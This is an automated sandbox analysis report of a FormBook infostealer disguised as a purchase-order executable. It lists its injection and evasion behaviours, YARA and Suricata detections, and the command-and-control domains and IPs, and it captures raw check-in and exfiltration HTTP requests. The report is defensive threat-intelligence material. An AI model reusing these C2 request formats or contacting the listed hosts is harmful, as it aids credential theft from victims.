Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-DOC1522025-12.exe

Overview

General Information

Sample name:PO-DOC1522025-12.exe
Analysis ID:1591632
MD5:dc2314bb7a5383eb616a78e1f43d4472
SHA1:99cdff011d26e805ce19f8d84c5538181d02db0f
SHA256:d26aea201415a8250f0ef469e579d33056696b102a6ca42ead5a838a29b15ba4
Tags:exeQuotationuser-cocaman
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PO-DOC1522025-12.exe (PID: 1444 cmdline: "C:\Users\user\Desktop\PO-DOC1522025-12.exe" MD5: DC2314BB7A5383EB616A78E1F43D4472)
    • svchost.exe (PID: 5328 cmdline: "C:\Users\user\Desktop\PO-DOC1522025-12.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • wRnnQBtyTqqaEOnAYYgvzRWAV.exe (PID: 1672 cmdline: "C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 7116 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • wRnnQBtyTqqaEOnAYYgvzRWAV.exe (PID: 3328 cmdline: "C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5916 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", CommandLine: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", ParentImage: C:\Users\user\Desktop\PO-DOC1522025-12.exe, ParentProcessId: 1444, ParentProcessName: PO-DOC1522025-12.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", ProcessId: 5328, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", CommandLine: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", ParentImage: C:\Users\user\Desktop\PO-DOC1522025-12.exe, ParentProcessId: 1444, ParentProcessName: PO-DOC1522025-12.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", ProcessId: 5328, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-15T08:28:32.233926+010020507451Malware Command and Control Activity Detected192.168.2.649864154.215.72.11080TCP
            2025-01-15T08:29:04.255471+010020507451Malware Command and Control Activity Detected192.168.2.649904116.50.37.24480TCP
            2025-01-15T08:30:30.972757+010020507451Malware Command and Control Activity Detected192.168.2.64991085.159.66.9380TCP
            2025-01-15T08:30:44.635383+010020507451Malware Command and Control Activity Detected192.168.2.64991691.195.240.9480TCP
            2025-01-15T08:31:06.171460+010020507451Malware Command and Control Activity Detected192.168.2.64992066.29.149.4680TCP
            2025-01-15T08:31:19.801583+010020507451Malware Command and Control Activity Detected192.168.2.649924195.110.124.13380TCP
            2025-01-15T08:31:49.267638+010020507451Malware Command and Control Activity Detected192.168.2.649929217.196.55.20280TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: PO-DOC1522025-12.exeAvira: detected
            Source: http://www.rssnewscast.com/fo8o/?pnGX8L3p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&xZ4P=rRldwLg0ALTXzVVAvira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?pnGX8L3p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&xZ4P=rRldwLg0ALTXzVVAvira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/?pnGX8L3p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=&xZ4P=rRldwLg0ALTXzVVAvira URL Cloud: Label: malware
            Source: http://www.techchains.info/fo8o/Avira URL Cloud: Label: malware
            Source: PO-DOC1522025-12.exeVirustotal: Detection: 30%Perma Link
            Source: PO-DOC1522025-12.exeReversingLabs: Detection: 42%
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: PO-DOC1522025-12.exeJoe Sandbox ML: detected
            Source: PO-DOC1522025-12.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000002.4618964468.0000000000B7E000.00000002.00000001.01000000.00000004.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000000.2376979999.0000000000B7E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO-DOC1522025-12.exe, 00000000.00000003.2158675460.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, PO-DOC1522025-12.exe, 00000000.00000003.2148299636.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300439322.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204520279.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300439322.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2206583062.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4622084079.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2302825113.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4622084079.0000000000C3E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2300126241.0000000000740000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO-DOC1522025-12.exe, 00000000.00000003.2158675460.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, PO-DOC1522025-12.exe, 00000000.00000003.2148299636.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2300439322.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204520279.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300439322.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2206583062.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.4622084079.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2302825113.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4622084079.0000000000C3E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2300126241.0000000000740000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2269062053.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300088852.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000003.2239214406.0000000000D55000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4623285061.000000000329C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4617655793.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000000.2377197229.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2594702561.000000003778C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4623285061.000000000329C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4617655793.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000000.2377197229.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2594702561.000000003778C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2269062053.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300088852.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000003.2239214406.0000000000D55000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0017C2A2 FindFirstFileExW,0_2_0017C2A2
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B68EE FindFirstFileW,FindClose,0_2_001B68EE
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_001B698F
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001AD076
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001AD3A9
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001B9642
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001B979D
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_001B9B2B
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_001ADBBE
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_001B5C97
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001DBAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_001DBAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax4_2_001C9480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi4_2_001CDD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h4_2_0099053E

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49864 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49904 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49916 -> 91.195.240.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49929 -> 217.196.55.202:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49910 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49924 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49920 -> 66.29.149.46:80
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001BCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_001BCE44
            Source: global trafficHTTP traffic detected: GET /fo8o/?pnGX8L3p=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?pnGX8L3p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?pnGX8L3p=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?pnGX8L3p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?pnGX8L3p=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?pnGX8L3p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?pnGX8L3p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: global trafficDNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: global trafficDNS traffic detected: DNS query: www.shenzhoucui.com
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 213Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 70 6e 47 58 38 4c 33 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4f 7a 42 6a 36 4a 36 37 6b 76 66 53 54 37 30 43 57 78 57 66 67 72 67 58 30 55 65 42 5a 37 65 4f 56 45 76 6b 57 45 76 75 30 41 64 Data Ascii: pnGX8L3p=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOOzBj6J67kvfST70CWxWfgrgX0UeBZ7eOVEvkWEvu0Ad
